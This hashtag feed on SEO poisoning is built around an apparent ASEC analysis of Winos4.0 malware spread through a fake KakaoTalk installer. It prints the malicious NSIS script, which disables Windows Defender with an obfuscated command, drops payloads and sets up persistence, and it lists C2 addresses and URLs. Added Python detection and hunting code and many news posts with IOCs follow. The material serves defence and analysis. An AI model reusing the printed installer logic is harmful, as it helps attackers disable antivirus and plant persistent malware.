#SEOPoisoning

BadIIS alone? Cute. While 1,800+ IIS servers moonlight as SEO scam billboards, this shows how IIS modules + HTTP fingerprints catch cloaking before your site starts selling “totally legit” malware 🙃🔎

#AlphaHunt #CyberSecurity #ThreatIntel #SEOPoisoning


Cybercriminals exploit SEO to distribute malware via fake software installers. Stay vigilant and download software only from official sources. #CyberSecurity #MalwareAlert #SEOpoisoning Link: thedailytechfeed.com/cybercrimina...

Winos4.0 malware disguised as KakaoTalk installation file Threat actors used SEO poisoning to place fake KakaoTalk download pages at the top of search results and distributed a malicious installer that infected over 5,000 PCs. The installer uses an invalid NetEase signature, decrypts and drops components (Verifier.exe, AutoRecoverDat.dll, GPUCache.xml/GPUCache2.xml) to establish persistence, add Windows Defender exclusions, and connect to...

Winos4.0 malware disguised as a fake KakaoTalk installer spread via SEO poisoning, infecting over 5,000 PCs. Malicious files bypassed Windows Defender and connected to C2 servers. #SEOpoisoning #MalwareAttack #SouthKorea

Winos4.0 Malware Disguised as KakaoTalk Installer (AhnLab Security Intelligence Center, ASEC)

# Distribution Method – SEO Poisoning

People typically treat the sites at the top of Google's search results as the most authoritative and official ones. Threat actors exploit that assumption by manipulating search-engine ranking to place malicious sites at the top. SEO poisoning is an attack technique in which threat actors use search engine optimization (SEO) methods to push websites they control to the top of the results for specific keywords, usually onto pages one to three. The goal is to distribute malware or steal information by steering users who are trying to download official software or look something up to a carefully crafted fake site.

[Figure 1] SEO poisoning attack process

ASEC recently confirmed that more than 5,000 PCs were infected by a fake KakaoTalk installer circulated through SEO poisoning. On the surface the file looks like a KakaoTalk installer, but internally it executes malware and stays resident on the system.

Figure 2 shows the fake KakaoTalk installer ranked first in a Google search for the PC version of KakaoTalk. It is not the official KakaoTalk download page but a look-alike built by the threat actors with KakaoTalk's characters and logo. The site appears to have used SEO poisoning to force the malicious page to the top of the results for certain keywords.

[Figure 2] Fake KakaoTalk sites appearing at the top of search engines (Bing and Google)

The fake KakaoTalk site:

* hxxps://pc-kakaocorp[.]com

The URLs from which the final malware is downloaded after redirection:
* hxxps://download.i96l6[.]top/KakaoTalk_Setup_patched.RAR
* hxxps://xinjiapox.oss-ap-southeast-1.aliyuncs[.]com/KakaoTa2258.zip

According to ASEC telemetry, the fake KakaoTalk installer distributed this way was first seen on March 9th.

[Figure 3] Trend of fake KakaoTalk installation files (~3/14)

# Malware Analysis

Downloading the installer from the fake site yields malware carrying the KakaoTalk icon, as shown below. It is signed with an invalid certificate issued in the name "NetEase" (China), not the certificate Kakao signs its official releases with.

[Figure 4] Invalid digital signature information

The NSIS installer bundles a large amount of encrypted data alongside legitimate NSIS configuration files and decrypts it at run time to create and execute malicious components such as Verifier.exe and AutoRecoverDat.dll. It also adds Windows Defender exclusion paths to weaken protection and establishes persistence by registering the DLL. To keep up the appearance of a legitimate installer, it additionally drops a genuine KakaoTalk_Setup.exe next to the malicious components.
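The Defender-exclusion line in the NSIS script quoted below is obfuscated by splitting every token with NSIS `$\"` escapes; each `$\"$\"` pair becomes an empty `""` in the string actually handed to cmd.exe, which drops such pairs when it resolves the program name. The following Python is an added example, not code from the ASEC report: it resolves the NSIS escapes, strips the quote pairs, and then flags whole-drive `Add-MpPreference -ExclusionPath` arguments. The sample string is copied from the script; the function names and the drive-root heuristic are this example's own.

```python
import re

# Constructed sample: the Defender-exclusion command exactly as it appears in the
# NSIS script from the write-up. `$\"` is NSIS's escape for a literal double quote.
NSIS_LITERAL = (
    'cmd.exe /C powe$\\"$\\"r$\\"$\\"s$\\"$\\"h$\\"$\\"ell.exe '
    '-Ex$\\"$\\"ec$\\"$\\"uti$\\"$\\"o$\\"$\\"nPol$\\"$\\"ic$\\"$\\"y '
    'By$\\"$\\"pa$\\"$\\"s$\\"$\\"s '
    '-C$\\"$\\"om$\\"$\\"ma$\\"$\\"n$\\"$\\"d '
    'Ad$\\"$\\"d$\\"$\\"-M$\\"$\\"pPr$\\"$\\"ef$\\"$\\"ere$\\"$\\"nce '
    '-Ex$\\"$\\"cl$\\"$\\"usion$\\"$\\"Path C:\\, D:\\,E:\\,F:\\'
)


def nsis_unescape(literal: str) -> str:
    """Resolve the NSIS string escapes used in installer scripts:
    $\\" (double quote), $\\r, $\\n, $\\t and $$ (literal dollar)."""
    out = literal
    for esc, ch in (('$\\"', '"'), ('$\\r', '\r'), ('$\\n', '\n'), ('$\\t', '\t')):
        out = out.replace(esc, ch)
    return out.replace('$$', '$')


def strip_empty_quote_pairs(cmdline: str) -> str:
    """Drop the "" pairs the obfuscator sprinkles through the command line.
    cmd.exe ignores them when resolving the program name and the Windows
    argument parser treats them as empty quoted sections, so this is the
    command an analyst should read and a detection should match on."""
    return cmdline.replace('""', '')


def deobfuscate_nsis_command(literal: str) -> str:
    return strip_empty_quote_pairs(nsis_unescape(literal))


# Heuristic (this example's own): a bare drive root such as C:\ excludes the whole drive.
DRIVE_ROOT = re.compile(r'^[A-Za-z]:\\?$')


def defender_exclusion_roots(cmdline: str) -> list:
    """Drive roots excluded via Add-MpPreference -ExclusionPath in a deobfuscated
    command line. Whole-drive exclusions switch off on-access scanning for
    everything that matters, which is the behaviour worth alerting on."""
    m = re.search(r'Add-MpPreference\s+-ExclusionPath\s+(.+)$', cmdline, re.IGNORECASE)
    if not m:
        return []
    paths = [p.strip() for p in m.group(1).split(',')]
    return [p for p in paths if DRIVE_ROOT.match(p)]


def assess(literal: str) -> dict:
    """Deobfuscate one NSIS string literal and summarise what it does to Defender."""
    cmd = deobfuscate_nsis_command(literal)
    roots = defender_exclusion_roots(cmd)
    return {
        'command': cmd,
        'obfuscated': '""' in nsis_unescape(literal),
        'whole_drive_exclusions': roots,
        'verdict': 'Defender neutralised' if roots else 'no whole-drive exclusion',
    }


if __name__ == '__main__':
    for key, value in assess(NSIS_LITERAL).items():
        print(f'{key}: {value}')
```

Matching `Add-MpPreference` only after deobfuscation is the point: a rule written against the raw `powe""r""s""h""ell.exe` text never fires, whereas a rule on the process command line as Windows records it (4688 / Sysmon event 1) sees the quote pairs already gone.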
The relevant parts of the NSIS script (NSIS writes a literal double quote as `$\"`):

```nsis
; Defender exception (neutralization)
StrCpy $0 "cmd.exe /C powe$\"$\"r$\"$\"s$\"$\"h$\"$\"ell.exe -Ex$\"$\"ec$\"$\"uti$\"$\"o$\"$\"nPol$\"$\"ic$\"$\"y By$\"$\"pa$\"$\"s$\"$\"s -C$\"$\"om$\"$\"ma$\"$\"n$\"$\"d Ad$\"$\"d$\"$\"-M$\"$\"pPr$\"$\"ef$\"$\"ere$\"$\"nce -Ex$\"$\"cl$\"$\"usion$\"$\"Path C:\, D:\,E:\,F:\"
nsExec::Exec $0

; Decryption and drop of the encrypted payloads ($R0 is passed to every call, likely the key material)
StrCpy $R0 $TEMP\temp_k.txt
StrCpy $R1 $TEMP\lic.dat
DcryptDll::Decrypt FFF $R0 $R1 $LOCALAPPDATA\Verifier.exe
StrCpy $R2 $TEMP\Profilerjson
DcryptDll::Decrypt FFF $R0 $R2 $LOCALAPPDATA\Profiler.json
StrCpy $R3 $TEMP\GPUCachexml
DcryptDll::Decrypt FFF $R0 $R3 $APPDATA\GPUCache.xml
StrCpy $R5 $TEMP\GPUCache2xml
DcryptDll::Decrypt FFF $R0 $R5 $APPDATA\GPUCache2.xml
DcryptDll::Decrypt FFF $R0 $R3 $APPDATA\Embarcadero\GPUCache.xml
DcryptDll::Decrypt FFF $R0 $R5 $APPDATA\Embarcadero\GPUCache2.xml
StrCpy $R4 $TEMP\Auto.dat
DcryptDll::Decrypt FFF $R0 $R4 $APPDATA\Embarcadero\AutoRecoverDat.dll

; Malicious DLL registration (persistence)
StrCpy $8 "cmd.exe /C $\"start rundll32.exe $APPDATA\Embarcadero\AutoRecoverDat.dll ,DllRegisterServer$\""
nsExec::Exec $8

; Run the main payload
Exec $LOCALAPPDATA\Verifier.exe
Sleep 25000

; Create a genuine KakaoTalk installer and a desktop shortcut to it
StrCpy $R9 $INSTDIR\DIR
DcryptDll::Decrypt FFF $R0 $R9 $INSTDIR\KakaoTalk_Setup.exe
CreateShortCut $DESKTOP\KakaoTalk_Setup.lnk $INSTDIR\KakaoTalk_Setup.exe

; Additional obfuscated files
File eqinpqabpwm
File omyivwqtlzwtnl
File xkaljrsp
File ziucakk

; Registry tagging
WriteRegStr HKCU MicrosoftUser Source kakao
```

After the initial installer, the malicious behaviour is split across two files: the shellcode (Profiler.json) loaded by Verifier.exe, and the shellcode (GPUCache.xml) loaded by AutoRecoverDat.dll, which is run via rundll32.exe. The relationship between the main files used by the malware is shown in the table below.
**File name** | **Role**
---|---
Verifier.exe | Patches legitimate software to load shellcode (Profiler.json)
Profiler.json | Shellcode (reflective DLL loader, based on the open-source sRDI)
GPUCache.xml | Winos4.0 malware
GPUCache2.xml | Winos4.0 malware
AutoRecoverDat.dll | Loader that loads shellcode (GPUCache.xml)

Verifier.exe and AutoRecoverDat.dll are executed in different ways, but both end up loading GPUCache.xml or GPUCache2.xml (the Winos4.0 malware). After creating a mutex with the hard-coded name **77825d8f-46d1-42d0-b298-83068bf9e31d** via the **CreateMutexA** API, the choice of shellcode depends on two conditions:

* Condition 1: whether a mutex with that name already exists
* Condition 2: whether the file ActivityLog.xml exists under %APPDATA%\Embarcadero

If both conditions are met, the shellcode in %APPDATA%\Embarcadero\GPUCache2.xml is loaded; if either is not, the shellcode in %APPDATA%\Embarcadero\GPUCache.xml is loaded.

[Figure 5] Shellcode file loaded depending on the conditions

The C2 server also differs according to which shellcode is loaded:

* GPUCache.xml
  * C2: 192.238.129[.]47
  * Port: 18852
* GPUCache2.xml
  * C2: 119.28.70[.]225
  * Port: 443

The GPUCache(2).xml file loaded here is shellcode that starts with 0xE8 (opcode: CALL). It is not encrypted, so the code is present as-is, and it carries another executable (a DLL) inside. When the shellcode runs, it loads that DLL into memory and executes it.

[Figure 6] PE signature (MZ) inside the shellcode

There is also logic to check whether an AV product is installed. Given that the products the threat actors check for are **360 Total Security and ZhuDongFangYu**, both used predominantly in China, the malware was probably originally built for distribution sites in China.
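The triage step the paragraph above implies, as an added example that is not part of the ASEC report: confirm a blob opens with an E8 CALL and carve the embedded DLL by following the MZ → e_lfanew → `PE\0\0` chain, rather than trusting any bare `MZ` byte pair. The sample blob is constructed here (a CALL/POP stub plus a minimal fake PE header) and is not GPUCache.xml; run the script with a file path to analyse a real blob.

```python
import struct
import sys

CALL_OPCODE = 0xE8


def starts_with_call(blob: bytes) -> bool:
    """The loader stub starts with E8 <rel32> (CALL): the usual position-independent
    opening of shellcode that needs its own address pushed onto the stack."""
    return len(blob) >= 5 and blob[0] == CALL_OPCODE


def call_target(blob: bytes) -> int:
    """Offset within the blob that the leading CALL transfers control to."""
    rel32 = struct.unpack_from('<i', blob, 1)[0]
    return 5 + rel32


def find_embedded_pe(blob: bytes) -> list:
    """Every 'MZ' whose e_lfanew (DWORD at +0x3C) lands on a 'PE\\0\\0' signature
    inside the blob. Validating e_lfanew filters out the stray 'MZ' pairs that
    occur by chance in any sizeable binary."""
    hits = []
    pos = blob.find(b'MZ')
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from('<I', blob, pos + 0x3C)[0]
            pe = pos + e_lfanew
            if 0x40 <= e_lfanew < 0x1000 and pe + 24 <= len(blob) and blob[pe:pe + 4] == b'PE\0\0':
                machine, nsections = struct.unpack_from('<HH', blob, pe + 4)
                characteristics = struct.unpack_from('<H', blob, pe + 22)[0]
                hits.append({
                    'offset': pos,
                    'e_lfanew': e_lfanew,
                    'machine': machine,                         # 0x14C = x86, 0x8664 = x64
                    'sections': nsections,
                    'is_dll': bool(characteristics & 0x2000),   # IMAGE_FILE_DLL
                })
        pos = blob.find(b'MZ', pos + 1)
    return hits


def carve_first_pe(blob: bytes) -> bytes:
    """Bytes from the first validated MZ header to the end of the blob (the usual
    layout for sRDI-style loaders, which append the DLL after the stub)."""
    hits = find_embedded_pe(blob)
    return blob[hits[0]['offset']:] if hits else b''


def build_sample() -> bytes:
    """Constructed stand-in for GPUCache.xml: CALL $+5 / POP EBX / NOPs, then a
    minimal, non-runnable PE with a valid MZ -> e_lfanew -> PE chain."""
    stub = b'\xE8\x00\x00\x00\x00' + b'\x5B' + b'\x90' * 26
    dos = bytearray(0x80)
    dos[0:2] = b'MZ'
    struct.pack_into('<I', dos, 0x3C, 0x80)                       # e_lfanew
    # COFF header: Machine=x86, 3 sections, SizeOfOptionalHeader=0xE0,
    # Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL
    coff = b'PE\0\0' + struct.pack('<HHIIIHH', 0x14C, 3, 0, 0, 0, 0xE0, 0x2102)
    return stub + bytes(dos) + coff + b'\x00' * 64


if __name__ == '__main__':
    data = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 else build_sample()
    if starts_with_call(data):
        print(f'leading CALL -> offset {call_target(data):#x}')
    for hit in find_embedded_pe(data):
        print(hit)
```

For a real sample, write `carve_first_pe(data)` to disk and hash it separately from the shellcode: the DLL is what carries the Winos4.0 logic and C2 configuration, and it is the artefact worth matching against the published MD5s and against vendor rules.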
[Figure 7] Determining whether the AV product is active

The subsequent persistence method differs depending on whether that AV product is present on the system, but in the end the following scheduled tasks are created:

* Path (common): Microsoft\Windows\AppID
* Task 1: .NET Framework adv v6.0.4232
  * Action: %LocalAppData%\Verifier.exe
* Task 2: .NET Framework JDAH v7.7
  * Action: rundll32.exe %AppData%\Embarcadero\AutoRecoverDat.dll, DllRegisterServer

The final operational payload is identified as Winos4.0. Winos4.0's main capabilities are screen capture, file and process control, system information collection, downloading additional malware, and evading monitoring and analysis environments. In particular, once C2 communication succeeds it executes data received from the C2 in memory allocated with VirtualAlloc. This means additional malware can be run at any time, and the threat actor can change the attack flow at will.

# Conclusion

The more familiar a program is, the more readily users hit the "download" button without a second thought, and threat actors take advantage of exactly that lapse. Impersonating a program as deeply embedded in daily life as KakaoTalk can cause damage well beyond a single compromise. A top position in the search results does not mean a site is safe: make it a habit to check the official domain before downloading any installer. One cleverly crafted file can steal personal information and assets in an instant.
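An added hunting example for the persistence described above, not code from ASEC: it parses Task Scheduler XML (the files under C:\Windows\System32\Tasks, which are UTF-16) and flags tasks whose action runs from a user-writable path, `rundll32.exe … DllRegisterServer` actions, and ".NET Framework …" names that sit outside the genuine Microsoft\Windows\.NET Framework folder. The task XML below is constructed to mirror the two tasks in the write-up plus a benign control; the heuristics and names are this example's own.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

TASK_NS = {'t': 'http://schemas.microsoft.com/windows/2004/02/mit/task'}
# Heuristic (this example's own): paths an unprivileged user can write to.
USER_WRITABLE = re.compile(
    r'%(LocalAppData|AppData|Temp|Tmp|UserProfile|Public)%|\\Users\\|\\AppData\\|\\Temp\\',
    re.IGNORECASE,
)
# Folder where the genuine .NET tasks live; a ".NET Framework ..." name anywhere else is mimicry.
DOTNET_TASK_FOLDER = r'microsoft\windows\.net framework'


def task_actions(xml_bytes: bytes):
    """Yield (command, arguments) for every <Exec> action in a task XML file.
    Pass raw bytes: the files are UTF-16 and the parser honours the BOM."""
    root = ET.fromstring(xml_bytes)
    for ex in root.findall('.//t:Actions/t:Exec', TASK_NS):
        cmd = (ex.findtext('t:Command', default='', namespaces=TASK_NS) or '').strip()
        args = (ex.findtext('t:Arguments', default='', namespaces=TASK_NS) or '').strip()
        yield cmd, args


def assess_task(task_path: str, xml_bytes: bytes) -> list:
    """Reasons a task looks like malware persistence (empty list = nothing found)."""
    findings = []
    folder, _, name = task_path.rpartition('\\')
    for cmd, args in task_actions(xml_bytes):
        target = f'{cmd} {args}'.strip()
        if USER_WRITABLE.search(target):
            findings.append(f'action runs from a user-writable path: {target}')
        if cmd.rsplit('\\', 1)[-1].lower() == 'rundll32.exe' and 'dllregisterserver' in args.lower():
            findings.append(f'rundll32 DllRegisterServer persistence: {args}')
    if findings and folder.lower().startswith('microsoft\\windows'):
        findings.append(f'suspicious task hidden among OS tasks in {folder}')
    if name.lower().startswith('.net framework') and folder.lower() != DOTNET_TASK_FOLDER:
        findings.append(f'name mimics a .NET Framework task but lives in {folder}')
    return findings


def hunt(tasks) -> dict:
    """tasks: iterable of (task_path, xml_bytes). Returns {task_path: findings} for hits only."""
    results = {}
    for path, xml_bytes in tasks:
        found = assess_task(path, xml_bytes)
        if found:
            results[path] = found
    return results


def tasks_from_disk(root=r'C:\Windows\System32\Tasks'):
    """Live use on a Windows host: walk the task store and yield (relative path, bytes)."""
    base = Path(root)
    for p in base.rglob('*'):
        if p.is_file():
            yield str(p.relative_to(base)), p.read_bytes()


def _task_xml(command: str, arguments: str = '') -> bytes:
    """Build a minimal task file in the on-disk format (UTF-16 with BOM)."""
    args = f'<Arguments>{arguments}</Arguments>' if arguments else ''
    xml = (
        '<?xml version="1.0" encoding="UTF-16"?>'
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        '<Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>'
        f'<Actions Context="Author"><Exec><Command>{command}</Command>{args}</Exec></Actions>'
        '</Task>'
    )
    return xml.encode('utf-16')


# Constructed samples: the two tasks from the write-up plus a benign control task.
SAMPLE_TASKS = [
    (r'Microsoft\Windows\AppID\.NET Framework adv v6.0.4232',
     _task_xml(r'%LocalAppData%\Verifier.exe')),
    (r'Microsoft\Windows\AppID\.NET Framework JDAH v7.7',
     _task_xml('rundll32.exe', r'%AppData%\Embarcadero\AutoRecoverDat.dll, DllRegisterServer')),
    (r'Microsoft\Windows\AppID\PolicyConverter',
     _task_xml(r'%windir%\system32\appidpolicyconverter.exe')),
]

if __name__ == '__main__':
    for path, reasons in hunt(SAMPLE_TASKS).items():
        print(path)
        for r in reasons:
            print('  -', r)
```

On a live host replace `SAMPLE_TASKS` with `tasks_from_disk()`; the same rules also apply to the `TaskName` and `Command` fields of event 4698 (task created) if you hunt from a SIEM rather than from disk.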
# IOCs

MD5
* 0ab84f52d043f7a7af54bd4df0331d64
* 108849450dd8410bf6217c9a7af82ab3
* 29152e0473edef5defc6752dabd0c53d
* 56ad524a33e5bb1ae8fee88d41b33294
* 8cad997c53fa31274ef0f542535c83b3

URL
* https[:]//download[.]i96l6[.]top/KakaoTalk_Setup_patched[.]rar
* https[:]//pc-kakaocorp[.]com/
* https[:]//xinjiapox[.]oss-ap-southeast-1[.]aliyuncs[.]com/KakaoTa2258[.]zip

IP
* 119[.]28[.]70[.]225
* 192[.]238[.]129[.]47

Related IOCs and detailed analysis are available to AhnLab TIP subscribers.

Tags: 카카오톡 SEOpoisoning TaskScheduler Winos4.0

Winos4.0 Malware Disguised as KakaoTalk Installer Distribution Method – SEO Poisoning Typically, people perceive the sites that appear at the top of Google search results as the “most authorita...

#Malware #Public #카카오톡 #SEOpoisoning #TaskScheduler #Winos4.0

[DEEP RESEARCH] BadIIS Isn’t Enough: The IIS Module + HTTP Fingerprints That Catch SEO-Fraud Cloaking *Vendors are naming slices of the same IIS SEO fraud problem differently. This summary aligns those labels into one unified hunt surface and shows how to separate UAT-8099/WEBJACK from other…

Your IIS can be “fine” while it cloaks Google, poisons SEO, and serves malware. BadIIS detections alone won’t catch it—fingerprint the module + HTTP lies. 🍀🕵️

Subscribe + read the full hunt playbook: blog.alphahunt.io/deep-researc...

#AlphaHunt #CyberSecurity #SEOPoisoning #IIS


"SEO Poisoning - My site has been under attack for a year"

#Référencement #SEO #Korben #Blog #SEOpoisoning ...

korben.info/seo-poisonin...


Almost International Women’s Day: your IIS is treating Googlebot like a queen 👑… and humans like casino traffic 🎰. BadIIS isn’t enough—hunt the module + HTTP fingerprints or enjoy “mystery SEO.”

#AlphaHunt #CyberSecurity #SEOPoisoning #IIS

[DEEP RESEARCH] BadIIS Isn’t Enough: The IIS Module + HTTP Fingerprints That Catch SEO-Fraud Cloaking *Vendors are naming slices of the same IIS SEO fraud problem differently. This summary aligns those labels into one unified hunt surface and shows how to separate UAT-8099/WEBJACK from other…

BadIIS isn’t “just SEO spam”—it’s an IIS module that serves Googlebot champagne and users malware. Detect it with HTTP fingerprints, not vibes. 🔎🧨

Read the hunt breakdown (and subscribe): blog.alphahunt.io/deep-researc...

#AlphaHunt #CyberSecurity #SEOPoisoning #IIS


Over 1,800 Windows servers compromised by BADIIS malware in a massive SEO poisoning campaign. Learn how attackers manipulate search results and how to protect your servers. #CyberSecurity #Malware #SEOpoisoning Link: thedailytechfeed.com/seo-poisonin...

Global BADIIS SEO Poisoning Campaign

~Elastic~
Large-scale SEO poisoning campaign uses BADIIS malware to compromise 1,800+ IIS servers, redirecting users to gambling and phishing sites.
-
IOCs: gotz003. com, gotz001. com, uupbit. top
-
#BADIIS #SEOPoisoning #ThreatIntel

Microsoft: Poison AI buttons and links may betray your trust : Businesses are embedding prompts that produce content they want you to read, not the stuff AI makes if left to its own devices

#Microsoft warns that poisoned #AI buttons and links may betray your trust
www.theregister.com/2026/02/12/m...

Software giant says its security researchers have detected a surge in "AI Recommendation Poisoning."
#CyberSecurity #InfoSec #ArtificialIntelligence #SEOpoisoning


🎰 Your IIS server isn’t “stable” — it’s doing SEO fraud. Vendors call it UAT-8099 vs WEBJACK… same neighborhood, different stickers. Merge the hunt: modules + $ accounts + header-cloaking. 🔥🕵️‍♂️

blog.alphahunt.io/deep-researc...

#BadIIS #IIS #SEOPoisoning #AlphaHunt

Alina Amir Video Leaked on Social Media Alina Amir viral video links spreading on X and Telegram are part of a dangerous SEO poisoning scam using university domains to spread malware. No real leaked video exists.

Alina Amir Video Leaked on Social Media
#AlinaAmir #ViralVideoScam #SEOpoisoning #PakistaniInfluencer #CyberScam #MalwareAlert #FakeViral #TelegramScam #TikTokNews #DigitalSafety
dailytrendmirror.com/entertainmen...


BlackCat (ALPHV) linked to an SEO-poisoning campaign that hijacks popular software search results to push malicious download pages and payloads; the source reports no published IoCs. #BlackCat #SEOpoisoning #malware https://bit.ly/4jzoT34


Fake Microsoft Teams and Google Meet downloads are being used to spread the #Oyster backdoor malware instead of the real apps via poisoned search results and malicious ads.

Read: mashread.com/fake-microso...

#PotatoSecurity #Malware #MicrosoftTeams #GoogleMeet #SEOpoisoning #Malvertising

Fake Microsoft Teams and Google Meet Downloads Spread Oyster Backdoor

Fake Microsoft Teams and Google Meet downloads are being used to spread the #Oyster backdoor malware instead of the real apps via poisoned search results and malicious ads.

Read: hackread.com/fake-microso...

#CyberSecurity #Malware #MicrosoftTeams #GoogleMeet #SEOpoisoning #Malvertising


Attackers are turning Google results into #malware delivery systems, using fake software installers and sponsored ads to plant backdoors inside organizations. Podcast: www.chatcyberside.com/e/search-res...

Video: youtu.be/xKKA1ikoZ-4

#SEOpoisoning #Malvertising #Cybersecurity #Software #Phishing

Cyberside Chats: Live! Poisoned Search: How Hackers Turn Google Results into Backdoors In this episode, Sherri Davidoff and Matt Durrin break down the latest SEO poisoning and malvertising research, including the Oyster/Broomstick campaign that hid backdoors inside fake installers. Lear...

Attackers are exploiting search results and online ads to spread #malware through fake software installers—and it’s working. In our next Cyberside Chats: Live! on 10/29, we'll uncover the latest #SEOpoisoning & #malvertising techniques & how they evade defenses. www.lmgsecurity.com/event/cybers...

SEO Poisoning Targets Ivanti VPN Users

~Zscaler~
An SEO poisoning campaign distributes a trojanized Ivanti VPN client to steal credentials for a C2 server.
-
IOCs: 4. 239. 95. 1, netml. shop, shopping5. shop
-
#Ivanti #SEOpoisoning #ThreatIntel


Cybercriminals are hijacking IIS servers using the BadIIS module to manipulate search results and redirect users to malicious sites. Stay vigilant! #CyberSecurity #IIS #BadIIS #SEOpoisoning Link: thedailytechfeed.com/cybercrimina...


Operation Rewrite is a Chinese SEO poisoning campaign that uses BadIIS to manipulate search engines and redirect users to scam sites.

#cina #CLUNK1037 #DragonRank #Group9 #OperationRewrite #SEOpoisoning
www.matricedigitale.it/2025/09/23/o...


⚠️ Operation Rewrite: Malicious IIS module hijacks websites

A Chinese-speaking threat actor deploys "BadIIS,” an IIS module that hijacks web servers to manipulate #SEO.

It detects search engine crawlers, serves poisoned content, then redirects real users to scam sites.

#ransomNews #SEOpoisoning

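The cloaking behaviour this post describes (crawlers get poisoned content, real visitors get redirected) can be checked from outside by requesting the same URL under different identities and diffing what comes back. The following Python is an added example and is not code from the post's author or from any vendor write-up: the user-agent strings, the spam keyword list and the sample responses are constructed for the illustration, and the live `fetch_view` helper is only needed when you point it at a real host.

```python
import hashlib
import re
import urllib.error
import urllib.request

# Identities to compare. A cloaking module keys on the crawler UA (and often on a
# search-engine Referer or on Googlebot's IP ranges, which this check cannot spoof).
UA = {
    'googlebot': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
    'browser': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
               '(KHTML, like Gecko) Chrome/120.0 Safari/537.36',
}
# Constructed keyword list for the gambling/betting spam seen in these campaigns.
SPAM_TERMS = re.compile(r'casino|slot|betting|baccarat|카지노|바카라|博彩|娱乐城', re.IGNORECASE)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):   # surface the 3xx instead of following it
        return None


def _view(status, headers, body: bytes) -> dict:
    return {'status': status,
            'headers': {k.lower(): v for k, v in dict(headers).items()},
            'body': body.decode('utf-8', 'replace')}


def fetch_view(url: str, user_agent: str, referer: str = None) -> dict:
    """Fetch one view of a URL without following redirects (live use only)."""
    headers = {'User-Agent': user_agent}
    if referer:
        headers['Referer'] = referer
    req = urllib.request.Request(url, headers=headers)
    opener = urllib.request.build_opener(_NoRedirect())
    try:
        with opener.open(req, timeout=10) as resp:
            return _view(resp.status, resp.headers, resp.read(200_000))
    except urllib.error.HTTPError as err:          # 3xx/4xx/5xx arrive here, headers intact
        return _view(err.code, err.headers, err.read(200_000))


def _title(body: str) -> str:
    m = re.search(r'<title[^>]*>(.*?)</title>', body, re.IGNORECASE | re.DOTALL)
    return re.sub(r'\s+', ' ', m.group(1)).strip() if m else ''


def compare_views(views: dict, baseline: str = 'browser') -> list:
    """Differences between what the baseline identity gets and what each other identity
    gets. A clean site yields []; a cloaking module yields several strong findings.
    Findings prefixed 'weak:' (body hash only) are expected on dynamic pages."""
    base = views[baseline]
    findings = []
    for name, v in views.items():
        if name == baseline:
            continue
        if v['status'] != base['status']:
            findings.append(f'{name}: status {v["status"]} vs {base["status"]} for {baseline}')
        loc_v, loc_b = v['headers'].get('location'), base['headers'].get('location')
        if loc_v != loc_b:
            findings.append(f'{name}: Location {loc_v!r} vs {loc_b!r} for {baseline}')
        t_v, t_b = _title(v['body']), _title(base['body'])
        if t_v != t_b:
            findings.append(f'{name}: title {t_v!r} vs {t_b!r} for {baseline}')
        if bool(SPAM_TERMS.search(v['body'])) != bool(SPAM_TERMS.search(base['body'])):
            findings.append(f'{name}: gambling/spam keywords present for one identity only')
        h_v = hashlib.sha256(v['body'].encode()).hexdigest()[:12]
        h_b = hashlib.sha256(base['body'].encode()).hexdigest()[:12]
        if h_v != h_b:
            findings.append(f'weak: {name}: body hash {h_v} vs {h_b} for {baseline}')
    return findings


def is_cloaked(views: dict) -> bool:
    return any(not f.startswith('weak:') for f in compare_views(views))


def check_site(url: str) -> list:
    """Live check: fetch every identity in UA and compare (not exercised offline)."""
    return compare_views({name: fetch_view(url, ua) for name, ua in UA.items()})


# Constructed sample responses: a cloaked host and a clean control.
SAMPLE_CLOAKED = {
    'googlebot': _view(200, {'Content-Type': 'text/html'},
                       ('<html><head><title>Best Online Casino Bonus 2025 - 카지노</title></head>'
                        '<body>slot baccarat betting ...</body></html>').encode()),
    'browser': _view(302, {'Location': 'https://promo.example-gambling.test/'}, b''),
}
SAMPLE_CLEAN = {
    name: _view(200, {'Content-Type': 'text/html'},
                b'<html><head><title>Acme Ltd</title></head><body>Welcome</body></html>')
    for name in UA
}

if __name__ == '__main__':
    for label, sample in (('cloaked', SAMPLE_CLOAKED), ('clean', SAMPLE_CLEAN)):
        print(label, is_cloaked(sample), compare_views(sample))
```

An empty result is not a clean bill of health: modules that verify Googlebot by reverse DNS, or that only cloak on a search-engine Referer, will serve you the honest page. Pair the external check with the server-side hunt (unexpected native modules in applicationHost.config and the IIS logs for crawler hits that never reach the real application).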
Operation Rewrite: BadIIS SEO Poisoning Campaign

~Paloalto~
Chinese-speaking actors use the BadIIS malware in a wide-scale SEO poisoning campaign targeting East and Southeast Asia.
-
IOCs: 103. 6. 235. 26, 404. 008php. com, 404. yyphw. com
-
#BadIIS #SEOpoisoning #ThreatIntel


Spot fakes • Skewer crooks • Show receipts

Dark Partners: 250+ fake AI/VPN sites + stolen certs push Poseidon (macOS) & PayDay (Win). Fresh week: hijacked Windows servers juicing Google rankings for scams. Stay click-sober. 🔐

#AlphaHunt #CyberSecurity #SEOpoisoning

SEO Poisoning Uses GitHub Pages to Distribute HiddenGh0st, Winos kkRAT

Cyber‑crime groups use SEO poisoning to hijack software‑download searches, serving HiddenGh0st, Winos and kkRAT from new malicious spoofed GitHub Pages sites. Read more: getnews.me/seo-poisoning-uses-githu... #seopoisoning #githubpages


SEO poisoning in China distributes Hiddengh0st and Winos via fake sites: tactics, IoCs, impact, and priority technical defences.

#cina #fortinet #Hiddengh0st #SEOpoisoning #Winos
www.matricedigitale.it/2025/09/15/s...

SEO Poisoning Attack Hits Windows Users With Hiddengh0st and Winos Malware

🚨 SEO poisoning alert! Watch what you download as #Windows users are being targeted with fake search results that lead to installers containing Hiddengh0st and Winos malware

Read: hackread.com/seo-poisonin...

#Cybersecurity #Malware #Hiddengh0st #Winos #SEOpoisoning

